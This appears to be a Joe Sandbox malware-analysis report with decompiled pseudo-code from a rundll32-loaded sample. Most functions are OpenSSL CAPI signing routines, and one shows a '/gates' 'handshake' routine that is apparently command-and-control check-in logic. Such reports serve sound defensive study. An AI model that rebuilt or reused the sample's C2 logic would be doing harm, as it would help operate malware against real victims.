                                        				E0000021E21EF30222D0(_t88, 0x72,  *0xf3209020,  &_v80, _t168,  *((intOrPtr*)(_t175 + 8)), _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302DA10( *0xf3209020,  &_v80, _t195);
                                        				goto 0xf302e634;
                                        				r9d = 0;
                                        				__imp__CryptSetHashParam();
                                        				if (0 != 0) goto 0xf302e4a4;
                                        				if ( *0xf3209020 != 0) goto 0xf302e47b;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t169);
                                        				_a8 = 0x3f5;
                                        				_t16 = _t195 - 0xc; // 0x66
                                        				r8d = _t16;
                                        				E0000021E21EF30222D0(_t93, 0x72,  *0xf3209020, _t169, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				_t95 = E0000021E21EF302DA10( *0xf3209020, _t169, _t195);
                                        				goto 0xf302e619;
                                        				_a16 =  &_v88;
                                        				r9d = 0;
                                        				_t171 =  &_v72;
                                        				_v88 = 0x28;
                                        				r8d = 0;
                                        				_a8 = _t171;
                                        				__imp__CryptSignHashW();
                                        				if (_t95 != 0) goto 0xf302e512;
                                        				_t159 =  *0xf3209020;
                                        				if ( *0xf3209020 != 0) goto 0xf302e4e9;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t171);
                                        				_a8 = 0x3fd;
                                        				_t25 = _t195 - 3; // 0x6f
                                        				r8d = _t25;
                                        				E0000021E21EF30222D0(_t97, 0x72,  *0xf3209020, _t171, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302DA10( *0xf3209020, _t171, _t195);
                                        				goto 0xf302e619;
                                        				E0000021E21EF3043D30( *0xf3209020, _t171, _t199, _t202);
                                        				_t198 = _t171;
                                        				E0000021E21EF3043D30(_t159, _t171, _t199, _t202);
                                        				_t176 = _t171;
                                        				if (_t171 == 0) goto 0xf302e609;
                                        				if (_t171 == 0) goto 0xf302e609;
                                        				_v53 = _v72 & 0x000000ff;
                                        				_v72 = _v53 & 0x000000ff;
                                        				_v54 = _v71 & 0x000000ff;
                                        				_v71 = _v54 & 0x000000ff;
                                        				_v55 = _v70 & 0x000000ff;
                                        				_v70 = _v55 & 0x000000ff;
                                        				_v56 = _v69 & 0x000000ff;
                                        				_v69 = _v56 & 0x000000ff;
                                        				_v57 = _v68 & 0x000000ff;
                                        				_v68 = _v57 & 0x000000ff;
                                        				_v58 = _v67 & 0x000000ff;
                                        				_v67 = _v58 & 0x000000ff;
                                        				_v59 = _v66 & 0x000000ff;
                                        				_v66 = _v59 & 0x000000ff;
                                        				_v60 = _v65 & 0x000000ff;
                                        				_v65 = _v60 & 0x000000ff;
                                        				_v61 = _v64 & 0x000000ff;
                                        				_v64 = _v61 & 0x000000ff;
                                        				_v62 = _v63 & 0x000000ff;
                                        				_v63 = _v62 & 0x000000ff;
                                        				E0000021E21EF3043370(0x14, _t171, _t171,  &_v72, _t202, _t171);
                                        				if (_t171 == 0) goto 0xf302e609;
                                        				r8d = 0x14;
                                        				if (E0000021E21EF3030F40(_t118, 0x14, _t171, _t171,  &_v52) == 0) goto 0xf302e609;
                                        				E0000021E21EF3046060(E0000021E21EF3030F40(_t118, 0x14, _t171, _t171,  &_v52), _t171, _t199, _t202);
                                        				if (_t171 == 0) goto 0xf302e609;
                                        				E0000021E21EF30460C0(_t171, _t171, _t171, _t171, _t171, _t176);
                                        				goto 0xf302e619;
                                        				E0000021E21EF3043B20(_t171, _t198);
                                        				_t117 = E0000021E21EF3043B20(_t171, _t176);
                                        				E0000021E21EF302A640();
                                        				__imp__CryptDestroyHash();
                                        				E0000021E21EF310C290();
                                        				return _t117;
                                        			}








































                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptHash$CreateDestroyParamSign
                                        • String ID: ($..\..\openssl-1.1.0f\engines\e_capi.c$Called CAPI_dsa_do_sign()
                                        • API String ID: 471198081-186588307
                                        • Opcode ID: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction ID: da3118f10d4c351e1c8bf103823e099ade8ff4546ef370de7a59a76231e27ab6
                                        • Opcode Fuzzy Hash: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction Fuzzy Hash: 87A1A33671529089FF21DBB19C187EF3BB06769788F05405AEE8957F96DA2CC606CB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E0000021E21EF302F6B0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long __rbp, intOrPtr* __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a32, char _a40, void* _a72, void* _a80, void* _a88, void* _a96) {
                                        				void* _t21;
                                        				long _t33;
                                        				long long _t70;
                                        				long long _t71;
                                        				long long _t73;
                                        				intOrPtr* _t87;
                                        				intOrPtr* _t90;
                                        
                                        				_t92 = __rbp;
                                        				_t75 = __rcx;
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_a32 = __rdi;
                                        				E0000021E21EF310C220();
                                        				_t87 = __r8;
                                        				_t90 = __rdx;
                                        				r8d = r9d;
                                        				_t21 = E0000021E21EF302D790(__rax, "capi_get_provname, index=%d\n", __r8, __r9);
                                        				_t70 =  &_a40;
                                        				_a32 = _t70;
                                        				r8d = 0;
                                        				_a24 = 0;
                                        				__imp__CryptEnumProvidersW();
                                        				if (_t21 != 0) goto 0xf302f76f;
                                        				if (GetLastError() != 0x103) goto 0xf302f72e;
                                        				goto 0xf302f895;
                                        				if ( *0xf3209020 != 0) goto 0xf302f743;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t70);
                                        				_a24 = 0x468;
                                        				r8d = 0x68;
                                        				E0000021E21EF30222D0(_t25, 0x68,  *0xf3209020, _t70, __rbx, _t75, "capi_get_provname, index=%d\n", _t90, __rbp, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302D9B0(_t22,  *0xf3209020, _t70, "capi_get_provname, index=%d\n");
                                        				goto 0xf302f895;
                                        				_t82 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				r8d = 0x46c;
                                        				E0000021E21EF3025700();
                                        				_t73 = _t70;
                                        				if (_t70 != 0) goto 0xf302f7c8;
                                        				if ( *0xf3209020 != 0) goto 0xf302f7a2;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t70);
                                        				_a24 = 0x46e;
                                        				_t11 = _t82 - 0x27; // 0x41
                                        				r8d = _t11;
                                        				E0000021E21EF30222D0(_t30, 0x68,  *0xf3209020, _t70, _t73, _t75, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t90, _t92, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302f895;
                                        				_t71 =  &_a40;
                                        				_a32 = _t71;
                                        				r8d = 0;
                                        				_a24 = _t73;
                                        				__imp__CryptEnumProvidersW();
                                        				if (0 != 0) goto 0xf302f852;
                                        				_t33 = GetLastError();
                                        				r8d = 0x473;
                                        				E0000021E21EF3025750();
                                        				if (_t33 == 0x103) goto 0xf302f724;
                                        				if ( *0xf3209020 != 0) goto 0xf302f829;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t71);
                                        				_a24 = 0x476;
                                        				r8d = 0x68;
                                        				E0000021E21EF30222D0(_t35, 0x68,  *0xf3209020, _t71, _t73, _t73, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t90, _t92, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302D9B0(_t33,  *0xf3209020, _t71, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302f895;
                                        				E0000021E21EF3030FB0(_t71, _t73);
                                        				r8d = 0x47c;
                                        				 *_t90 = _t71;
                                        				E0000021E21EF3025750();
                                        				if ( *_t90 == 0) goto 0xf302f768;
                                        				r9d =  *_t87;
                                        				E0000021E21EF302D790(_t71, "capi_get_provname, returned name=%s, type=%d\n",  *_t90, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				return 1;
                                        			}











                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptEnumErrorLastProviders
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d
                                        • API String ID: 747760079-1110243197
                                        • Opcode ID: d3c62bd487ecf3cefe709f60fa78e9c46ad0a716d246561f0684fb0ff28a9cde
                                        • Instruction ID: e612f314c78bb0472b3752c30760597e3332633ab22e7159d7d0c784ffcca3c2
                                        • Opcode Fuzzy Hash: d3c62bd487ecf3cefe709f60fa78e9c46ad0a716d246561f0684fb0ff28a9cde
                                        • Instruction Fuzzy Hash: 78515B76300B4086FF609B61EC087DB63E5B7A9B84F42402AAE4987F95EF3DC51AC744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 17%
                                        			E0000021E21EF302E0B0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r14) {
                                        				void* __rbp;
                                        				int _t30;
                                        				int _t31;
                                        				signed long long _t68;
                                        				signed long long _t69;
                                        				long long _t74;
                                        				char* _t87;
                                        				void* _t90;
                                        				signed long long _t95;
                                        				void* _t96;
                                        				void* _t97;
                                        				void* _t98;
                                        
                                        				E0000021E21EF310C220();
                                        				_t97 = _t96 - __rax;
                                        				_t95 = _t97 + 0x30;
                                        				 *((long long*)(_t95 + 0x20)) = __rbx;
                                        				 *((long long*)(_t95 + 0x28)) = __rsi;
                                        				 *((long long*)(_t95 + 0x30)) = __rdi;
                                        				 *((long long*)(_t95 + 0x38)) = __r14;
                                        				_t68 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t69 = _t68 ^ _t95;
                                        				 *(_t95 + 8) = _t69;
                                        				r14d = r8d;
                                        				r9d = r8d;
                                        				_t93 = __rdx;
                                        				_t90 = __rcx;
                                        				E0000021E21EF302D790(_t69, "capi_ctx_set_provname, name=%s, type=%d\n", __rdx, __r9);
                                        				if (r9d == 0) goto 0xf302e1a0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *((intOrPtr*)(_t97 + 0x28)) = 0;
                                        				 *(_t97 + 0x20) = _t69;
                                        				_t30 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				if (_t30 == 0) goto 0xf302e1f5;
                                        				_t9 = __rcx + __rcx + 0xf; // 0xf
                                        				if (_t9 - __rcx + __rcx > 0) goto 0xf302e146;
                                        				E0000021E21EF310C220();
                                        				_t98 = _t97 - 0xfffffff0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *(_t98 + 0x28) = _t30;
                                        				_t74 = _t98 + 0x30;
                                        				 *((long long*)(_t98 + 0x20)) = _t74;
                                        				_t31 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				if (_t74 == 0) goto 0xf302e1f5;
                                        				r9d = r14d;
                                        				 *((intOrPtr*)(_t98 + 0x20)) = 0xf0000000;
                                        				__imp__CryptAcquireContextW();
                                        				if (_t31 == 0) goto 0xf302e1f5;
                                        				__imp__CryptReleaseContext();
                                        				r8d = 0x665;
                                        				_t87 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t81 = __rdx;
                                        				E0000021E21EF3025150(0xffffffffffffff0, __rdx);
                                        				if (0xfffffff0 != 0) goto 0xf302e232;
                                        				if ( *0xf3209020 != 0) goto 0xf302e1d2;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(0xffffffffffffff0);
                                        				 *((intOrPtr*)(_t98 + 0x20)) = 0x667;
                                        				_t15 = _t87 - 0x25; // 0x41
                                        				r8d = _t15;
                                        				E0000021E21EF30222D0(_t34, 0x66,  *0xf3209020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302e255;
                                        				if ( *0xf3209020 != 0) goto 0xf302e20a;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(0xffffffffffffff0);
                                        				 *((intOrPtr*)(_t98 + 0x20)) = 0x65f;
                                        				_t17 = _t87 + 1; // 0x67
                                        				r8d = _t17;
                                        				E0000021E21EF30222D0(_t38, 0x66,  *0xf3209020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302DA10( *0xf3209020, 0xffffffffffffff0, _t87);
                                        				goto 0xf302e255;
                                        				r8d = 0x66a;
                                        				E0000021E21EF3025750();
                                        				 *((long long*)(_t90 + 0x18)) = 0xfffffff0;
                                        				 *(_t90 + 0x20) = r14d;
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}















                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Similarity
                                        • API ID: ByteCharContextCryptMultiWide$AcquireRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_ctx_set_provname, name=%s, type=%d
                                        • API String ID: 1602880654-1008237481
                                        • Opcode ID: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction ID: 62154f76160074fef7d04dbc68f133fa5b707cf1699bf09e9a971bc4e3722d7a
                                        • Opcode Fuzzy Hash: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction Fuzzy Hash: B2516E71300A8086EF609F65DC487DB27A1F7A8B98F46422AAE1987FD9DF3DC516C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 32%
                                        			E0000021E21EF2FF5CD0(void* __ebx, signed char __ecx, void* __edx, void* __edi, void* __eflags, long long __rbx, long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, signed char _a8, intOrPtr* _a40) {
                                        				void* _v24;
                                        				char _v312;
                                        				char _v584;
                                        				char _v592;
                                        				char _v736;
                                        				char _v1008;
                                        				char _v1016;
                                        				char _v1160;
                                        				char _v1232;
                                        				char _v1304;
                                        				char _v1544;
                                        				char _v1648;
                                        				char _v1656;
                                        				char _v1688;
                                        				char _v1736;
                                        				char _v1832;
                                        				char _v1856;
                                        				char _v1880;
                                        				char _v1904;
                                        				char _v1936;
                                        				long long _v1944;
                                        				long long _v1952;
                                        				char _v1976;
                                        				long long _v1984;
                                        				long long _v1992;
                                        				char _v2008;
                                        				void* _v2024;
                                        				char _v2040;
                                        				long long _v2056;
                                        				long long _v2064;
                                        				long long _v2072;
                                        				long long _v2080;
                                        				long long _v2088;
                                        				long long _v2096;
                                        				long long _v2104;
                                        				long long _v2112;
                                        				long long _v2120;
                                        				signed long long _v2128;
                                        				long long _v2136;
                                        				void* _v2168;
                                        				long long _v2176;
                                        				long long _v2184;
                                        				char _v2200;
                                        				char _v2224;
                                        				long long _v2232;
                                        				char _v2240;
                                        				long long _v2248;
                                        				long long _v2256;
                                        				long long _v2264;
                                        				long long _v2272;
                                        				long long _v2280;
                                        				long long _v2296;
                                        				long long _v2304;
                                        				long long _v2312;
                                        				char _v2328;
                                        				intOrPtr _v2332;
                                        				intOrPtr _v2336;
                                        				long long _v2344;
                                        				long long _v2352;
                                        				long long _v2360;
                                        				long long _v2368;
                                        				long long _v2376;
                                        				char _v2384;
                                        				long long _v2392;
                                        				long long _v2400;
                                        				long long _v2408;
                                        				char _v2416;
                                        				char _v2424;
                                        				long long _v2440;
                                        				char _v2448;
                                        				void* _v2456;
                                        				long long _v2464;
                                        				char _v2472;
                                        				char _v2484;
                                        				intOrPtr _v2488;
                                        				void* __rdi;
                                        				void* __r14;
                                        				void* _t178;
                                        				void* _t182;
                                        				long long _t183;
                                        				void* _t198;
                                        				signed int _t199;
                                        				signed int _t200;
                                        				char _t212;
                                        				void* _t214;
                                        				void* _t216;
                                        				void* _t227;
                                        				void* _t228;
                                        				signed char _t230;
                                        				void* _t239;
                                        				void* _t240;
                                        				long long _t265;
                                        				long long _t267;
                                        				long long _t277;
                                        				long long _t280;
                                        				long long _t282;
                                        				long long _t286;
                                        				long long _t289;
                                        				intOrPtr* _t290;
                                        				void* _t297;
                                        				long long _t340;
                                        				void* _t341;
                                        				long long _t349;
                                        				intOrPtr* _t367;
                                        				long long _t378;
                                        				void* _t379;
                                        				signed long long _t380;
                                        				signed long long _t381;
                                        				long long _t384;
                                        				void* _t387;
                                        				long long _t388;
                                        				char* _t393;
                                        				void* _t411;
                                        				void* _t413;
                                        				void* _t414;
                                        				long long _t416;
                                        
                                        				_t391 = __r8;
                                        				_t387 = __rbp;
                                        				_t354 = __rdx;
                                        				_t239 = __edi;
                                        				_t230 = __ecx;
                                        				_t228 = __ebx;
                                        				_t265 = _t388;
                                        				 *((long long*)(_t265 + 8)) = __rcx;
                                        				 *((long long*)(_t265 - 0x800)) = 0xfffffffe;
                                        				 *((long long*)(_t265 + 0x10)) = __rbx;
                                        				 *((long long*)(_t265 + 0x18)) = __rsi;
                                        				_t414 = __r9;
                                        				_t297 = __r8;
                                        				_t380 = __rdx;
                                        				_t384 = __rcx;
                                        				r15d = 0;
                                        				_v2488 = r15d;
                                        				 *((long long*)(__rcx + 0x18)) = 0xf;
                                        				 *((long long*)(__rcx + 0x10)) = _t416;
                                        				 *((intOrPtr*)(__rcx)) = r15b;
                                        				_v2488 = 1;
                                        				E0000021E21EF2FEFE70(__edx, _t265, __r8, _t265 - 0x8b0, __r8, _t416, _t413);
                                        				_t178 = E0000021E21EF2FF50D0(__edx, _t297,  &_v1936);
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x140], xmm0");
                                        				E0000021E21EF3001C60(_t178,  &_v2200, _t354, _t391, __r9);
                                        				E0000021E21EF2FEE9E0(_t297, _v2224,  &_v2200, E0000021E21EF3001C90,  &_v2224);
                                        				_v2248 = _t265;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x118], xmm0");
                                        				r8d = _a8 & 0x000000ff;
                                        				E0000021E21EF2FF9B20(__edi, _t297,  &_v2240);
                                        				_t393 =  &_v1936;
                                        				_t182 = E0000021E21EF2FF9C30(_t228, _t265,  &_v1656,  &_v2224, _t387, _t393);
                                        				if ( *((long long*)(_t380 + 0x18)) - 0x10 < 0) goto 0xf2ff5dd0;
                                        				goto 0xf2ff5dd3;
                                        				r8d = 0;
                                        				_t22 = _t393 + 0x37; // 0x37
                                        				E0000021E21EF30DD4D0();
                                        				if (_t182 != 0) goto 0xf2ff5e40;
                                        				_t183 = E0000021E21EF3021AE0(_t265);
                                        				E0000021E21EF2FF4EB0(_v1544,  &_v2224);
                                        				_v2280 = _t183;
                                        				_v2272 = _t265;
                                        				asm("movaps xmm0, [esp+0xf0]");
                                        				asm("movdqa [esp+0x1e0], xmm0");
                                        				E0000021E21EF2FEE330(_t297,  &_v1304,  &_v2040, _t379);
                                        				E0000021E21EF31103EC(_t297,  &_v1304, 0xf31e4670, _t384);
                                        				E0000021E21EF2FF69D0( &_v1976);
                                        				_v1992 =  &_v1856;
                                        				_t267 =  &_v1904;
                                        				_v1984 = _t267;
                                        				E0000021E21EF2FF66C0(_t267,  &_v1856);
                                        				_t298 = _t267;
                                        				E0000021E21EF2FF6700(_t267,  &_v1976,  &_v1904, _t384);
                                        				E0000021E21EF2FF9CF0(__edi, _t267,  &_v1880,  &_v1648, _t267, _t267);
                                        				0xf2ff2b00();
                                        				_v2448 = r15d;
                                        				E0000021E21EF310D880( &_v1880,  &_v1648);
                                        				_v2440 = _t267;
                                        				_v2484 = r15d;
                                        				E0000021E21EF2FFA5F0(_t22, __edi, _t240, _t267, _t267,  &_v1648,  &_v1544, _t380, _t384,  &_v2484,  &_v2448);
                                        				if (_v2448 == 0) goto 0xf2ff5f0d;
                                        				0xf2fee680();
                                        				_v2184 = "/gates";
                                        				_v2176 = 6;
                                        				asm("movaps xmm0, [esp+0x150]");
                                        				asm("movdqa [esp+0x1f0], xmm0");
                                        				r9d = 0xb;
                                        				E0000021E21EF2FF9FB0(_t298,  &_v1832, "handshake", _t384);
                                        				E0000021E21EF2FFA080("/gates",  &_v1160, _t380);
                                        				E0000021E21EF2FF94F0();
                                        				_v1952 =  &_v1016;
                                        				if (_v1016 == 0) goto 0xf2ff5fc1;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008))))();
                                        				_v1016 = 0;
                                        				E0000021E21EF30161F0(_t183, _t240, _t298,  &_v1688, _t380,  &_v1160,  &_v2448, _t411);
                                        				E0000021E21EF2FFA080( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)),  &_v736,  *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)));
                                        				E0000021E21EF2FF94F0();
                                        				_v1944 =  &_v592;
                                        				if (_v592 == 0) goto 0xf2ff6040;
                                        				_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v584 + 4)) +  &_v584))))();
                                        				_v592 = 0;
                                        				_t199 = E0000021E21EF2FE6100(_t198, _t230,  &_v1688);
                                        				_t367 = _a40;
                                        				_t277 =  *((intOrPtr*)(_t367 + 0x10));
                                        				if (_t277 == 0) goto 0xf2ff60ba;
                                        				_v2120 = _t277;
                                        				if ( *((long long*)(_t367 + 0x18)) - 0x10 < 0) goto 0xf2ff6070;
                                        				r8d = _t199;
                                        				_t200 = E0000021E21EF2FE1080( &_v312,  *_t367);
                                        				_v2112 =  *((intOrPtr*)(_t414 + 0x10));
                                        				if ( *((long long*)(_t414 + 0x18)) - 0x10 < 0) goto 0xf2ff6099;
                                        				goto 0xf2ff609c;
                                        				r8d = _t200;
                                        				E0000021E21EF2FE1290(E0000021E21EF2FE1400( *((long long*)(_t414 + 0x18)) - 0x10,  &_v312, _t414),  &_v312);
                                        				_t381 = _t380 | 0xffffffff;
                                        				if ( &_v1736 == _t414) goto 0xf2ff60e1;
                                        				r8d = 0;
                                        				E0000021E21EF2FE6530(_t298,  &_v1736, _t414, _t381, _t384,  &_v736, _t381);
                                        				E0000021E21EF2FF9E70( &_v1832);
                                        				E0000021E21EF2FFA0E0(_t298,  &_v1656,  &_v1832, _t381, _t384);
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x160], xmm0");
                                        				asm("xorps xmm1, xmm1");
                                        				asm("movdqu [esp+0x170], xmm1");
                                        				_v2136 = _t416;
                                        				_v2128 = _t381;
                                        				_t280 =  &_v2424;
                                        				_v2104 = _t280;
                                        				_v2416 = _t280;
                                        				_v2408 = _t280;
                                        				_v2400 = _t280;
                                        				_v2392 = _t280;
                                        				_v2416 = _t416;
                                        				_v2408 =  &_v2416;
                                        				_t282 =  &_v2416;
                                        				_v2400 = _t282;
                                        				_v2392 = r15d;
                                        				_v2424 = _t416;
                                        				_v2384 = _t282;
                                        				_v2376 = _t282;
                                        				_v2384 =  &_v2384;
                                        				_v2376 =  &_v2384;
                                        				_v2368 = _t416;
                                        				_v2360 = _t416;
                                        				_v2352 = _t416;
                                        				_v2344 = _t416;
                                        				_v2336 = 0xb;
                                        				_v2332 = 0xc8;
                                        				_v2096 =  &_v2328;
                                        				_v2312 = _t416;
                                        				_v2304 = _t416;
                                        				_v2304 = 0xf;
                                        				_v2312 = _t416;
                                        				_v2328 = 0;
                                        				E0000021E21EF2FFA220(_t298,  &_v1656,  &_v2168, _t381, _t384,  &_v2424, _t414);
                                        				_t286 =  &_v2328;
                                        				if (_t384 == _t286) goto 0xf2ff6258;
                                        				r8d = 0;
                                        				E0000021E21EF2FE6530(_t298, _t384,  &_v2328, _t381, _t384,  &_v2424, _t381);
                                        				_v2472 = r15d;
                                        				E0000021E21EF310D880(_t384,  &_v2328);
                                        				_v2464 = _t286;
                                        				E0000021E21EF2FFA380(0, _t239, _t240, _t384 - _t286, _t286, _t298,  &_v1648,  &_v1544, _t381, _t384,  &_v2424,  &_v2472);
                                        				0xf2fee810();
                                        				_v2088 = _t286;
                                        				_v2264 = 2;
                                        				_v2256 = _t286;
                                        				asm("movaps xmm0, [esp+0x100]");
                                        				asm("movdqa [esp+0x330], xmm0");
                                        				_t212 = _v2472;
                                        				if (_v2464 != _t286) goto 0xf2ff62c2;
                                        				if (_t212 == 2) goto 0xf2ff62fe;
                                        				if (_t212 == 0) goto 0xf2ff62fe;
                                        				asm("movaps xmm0, [esp+0x30]");
                                        				asm("movdqa [esp+0x200], xmm0");
                                        				E0000021E21EF2FEE330(_t298,  &_v1232,  &_v2008);
                                        				_t214 = E0000021E21EF31103EC(_t298,  &_v1232, 0xf31e4670, _t384);
                                        				_v2080 =  &_v2328;
                                        				E0000021E21EF2FE6100(_t214, _t230,  &_v2328);
                                        				_t216 = E0000021E21EF2FF9470(_t298,  &_v2424);
                                        				_t340 = _v2168;
                                        				if (_t340 == 0) goto 0xf2ff63ac;
                                        				_t289 = _v2136 - _t340;
                                        				_v2072 = _t289;
                                        				_v2296 = _t340;
                                        				if (_t289 - 0x1000 < 0) goto 0xf2ff63a6;
                                        				if ((_t230 & 0x0000001f) == 0) goto 0xf2ff6361;
                                        				0xf3111be8();
                                        				_t290 = _t340 - 8;
                                        				_v2064 = _t290;
                                        				_t378 =  *_t290;
                                        				_v2056 = _t378;
                                        				if (_t378 - _t340 < 0) goto 0xf2ff6382;
                                        				0xf3111be8();
                                        				_t341 = _t340 - _t378;
                                        				if (_t341 - 8 >= 0) goto 0xf2ff6390;
                                        				0xf3111be8();
                                        				if (_t341 - 0x27 <= 0) goto 0xf2ff639b;
                                        				0xf3111be8();
                                        				_v2296 = _t378;
                                        				0xf310ba8c();
                                        				_v2264 =  &_v1736;
                                        				E0000021E21EF2FE6100(_t216, _t230,  &_v1736);
                                        				E0000021E21EF2FF9470(_t298,  &_v1832);
                                        				E0000021E21EF2FF5BD0(_t239, _t298,  &_v1976);
                                        				E0000021E21EF2FF5710(_t341 - 0x27, _t298,  &_v1544, _t384,  &_v2472);
                                        				_v2280 =  &_v1648;
                                        				E0000021E21EF2FF8910(_t239, _t298,  &_v1648);
                                        				E0000021E21EF2FF6E60(_t239, _t298,  &_v2240,  &_v2424);
                                        				_t349 = _v2232;
                                        				if (_t349 == 0) goto 0xf2ff6463;
                                        				_v2456 = _t349;
                                        				asm("lock xadd [ecx+0x8], eax");
                                        				if (_t239 != 1) goto 0xf2ff6463;
                                        				 *((intOrPtr*)( *_v2456))();
                                        				asm("lock xadd [ebx+0xc], eax");
                                        				if (_t239 != 1) goto 0xf2ff6463;
                                        				 *((intOrPtr*)( *_v2456 + 8))();
                                        				_t227 = E0000021E21EF2FF51A0(_t239,  *_v2456, _v2456,  &_v1936);
                                        				asm("lock xadd [0x2151b7], edi");
                                        				if (_t239 != 1) goto 0xf2ff6485;
                                        				__imp__#116();
                                        				0xf2feed90();
                                        				return _t227;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionLeaveThrow$CleanupStartup
                                        • String ID: /gates$handshake
                                        • API String ID: 1678628239-1467732948
                                        • Opcode ID: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction ID: 18b0bee56757a3b81982a730980bb2e1f4c8efc93058e980308fc9aa9530d326
                                        • Opcode Fuzzy Hash: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction Fuzzy Hash: 0F122933219BC591EA71DB14E8883DEB3A4F7A4740F414616DE8D53EA9EF38C586CB84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E0000021E21EF31119BC(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                        				void* __rdi;
                                        				int _t38;
                                        				long _t40;
                                        				void* _t41;
                                        				intOrPtr _t49;
                                        				void* _t52;
                                        				signed long long _t59;
                                        				long long _t62;
                                        				_Unknown_base(*)()* _t82;
                                        				void* _t86;
                                        				void* _t87;
                                        				void* _t89;
                                        				signed long long _t90;
                                        				struct _EXCEPTION_POINTERS* _t96;
                                        
                                        				_t42 = __ecx;
                                        				 *((long long*)(_t89 + 0x10)) = __rbx;
                                        				 *((long long*)(_t89 + 0x18)) = __rsi;
                                        				_t87 = _t89 - 0x4f0;
                                        				_t90 = _t89 - 0x5f0;
